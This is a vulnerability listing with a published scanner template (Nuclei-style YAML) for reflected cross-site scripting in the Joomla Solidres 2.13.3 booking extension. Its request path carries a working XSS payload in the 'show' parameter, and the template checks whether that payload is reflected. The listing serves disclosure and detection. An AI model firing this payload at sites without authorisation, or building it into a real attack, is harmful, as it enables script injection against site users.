漏洞描述
Joomla extension for Solidres - Online Booking System & Reservation Software is vulnerable to XSS in GET parameter 'show'.
joomla-solidres-xss: Joomla Solidres 2.13.3 - Cross-Site Scripting
PoC代码[已公开]
id: joomla-solidres-xss
info:
name: Joomla Solidres 2.13.3 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Joomla extension for Solidres - Online Booking System & Reservation Software is vulnerable to XSS in GET parameter 'show'.
reference:
- https://www.exploit-db.com/exploits/51638
- https://cxsecurity.com/issue/WLB-2023070080
- https://cyberlegion.io/joomla-solidres-2-13-3-cross-site-scripting/
metadata:
verified: true
max-request: 1
tags: xss,joomla,unauth,vuln
http:
- method: GET
path:
- "{{BaseURL}}/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=0&show=db8ck%22onfocus=%22confirm(document.domain)%22autofocus=%22xwu0k"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'onfocus="confirm(document.domain)"autofocus'
- 'com_solidres'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
# digest: 4a0a00473045022100dfd313ff5cc0e5fd3398aa0a033aa79efae90f819aae600a4fee948c83954f99022013b9641d0e4c66165ef977c9cf95c48c5a89b6baa1c9fbc885c2a3f2524d7a9c:922c64590222798bb761d5b6d8e72950